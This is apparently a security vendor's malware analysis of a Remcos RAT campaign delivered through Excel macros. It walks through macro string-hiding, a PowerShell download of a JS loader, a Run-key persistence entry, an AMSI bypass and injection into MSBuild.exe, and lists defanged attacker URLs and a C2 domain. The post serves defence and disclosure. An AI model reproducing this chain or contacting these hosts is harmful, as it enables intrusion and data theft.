The ASEC analysis team identified that Remcos RAT malware is being distributed through malicious macros in Excel files. As for the malware, the team introduced it in detail in the post linked below this text. While the method of coming into the system through spam mails is the same as before, it should be noted that the Remcos RAT malware is ultimately delivered filelessly after going through multiple loader stages.
In summary, the overall operation method is as follows:
The attacker attaches Excel files that include malicious macros to e-mails for distribution, When the macro is executed, it uses PowerShell to download a JS file and additional data. Afterward, Remcos RAT malware is run with the method of being injected into the normal Windows process MSBuild.exe.
The spam mail tells the reader not to reply as it is an automated message and asks to check and open the attached file. There are cases where Remcos RAT malware is directly distributed as an attachment file, but in this case, the attacker used a macro in Excel file to download it.
Opening the attached Excel file shows that it is not much different from other malicious Excel macro files. Yet because the macro code from Figure 5 used values from cells A5, A6, and A7, we can assume that the attacker intentionally hid column A (see Figure 3).
The VBA macro code shows that it first uses the hyperlinks function for data in cells A5, A6, and A7. Then to execute the system command, the macro uses the ShellExecute method of the Shell Application (cell A7) object to run the data in cell A5 with “P” + owershell (cell A6 data in reverse order).
Decoding the data of cell A5 which is ultimately executed by using powershell in the VBA code shows the figure above. With the launchbar set as hidden, the macro downloads the js file from hxxp://192.227.158[.]111/fud.js, saves in the %APPDATA% path with the filename of fud.js, and runs the file.
The fud.js file can be roughly divided into two parts. The following shows some noticeable traits of the code.
1) Maintain persistence (cmd.exe)
● Copies the js file in the sub path of %APPDATA%Roaming and registers in the RUN registry.
● reg_key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lol
● reg_value: C:\Users\[user name]\AppData\Roaming\fud.js
2) Load binary (powershell.exe)
● AMSI (Anti-Malware Scan Interface) Bypass
● Test-Connection cmdlet
Performs the connection test to google.com and check if the PC can be connected to a network.
● Download additional malicious data
Downloads the string from the external URL (hxxp://vendorcreditglobal[.]online/file/dino.jpg).
From the PE signature 4D5A (MZ) shown in the small black box from Figure 10, we can assume that the PE file will be loaded in the future. The PE file is the first object found within the powershell code, which is a dll file packed in the .NET form. The second object is a file with the gzip form, and within gzip, there is Remcos RAT malware.
The function ‘[YESS]::f77df00sd’ found in the last part of Figure 11 injects itself to the normal process MSBuild.exe and loads the first object .NET binary, which allows the second object Remcos RAT malware to be executed.
Remcos used for this attack was found to be the latest version released on June 18th.
As we can see from the packet capture shown above, RST packets are being received when the malware attempts to connect to the Remcos C2 server. When the server is on, it is likely that the malware will leak data obtained with the keylogger and will perform additional features.
Users should refrain from opening emails from unknown sources and not run or enable macro when downloading attachment files. If the security level of the document program is set to low, macros may run automatically without any notification. Therefore, users should set the security level to high to prevent any unintended features from being run.
Also, users are advised to update the anti-malware engine pattern to its latest version.
AhnLab’s anti-malware product, V3, detects and blocks the malicious types of files introduced in the post using the aliases below.
twistednerd.dvrlists[.]com (Remcos RAT C2)
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.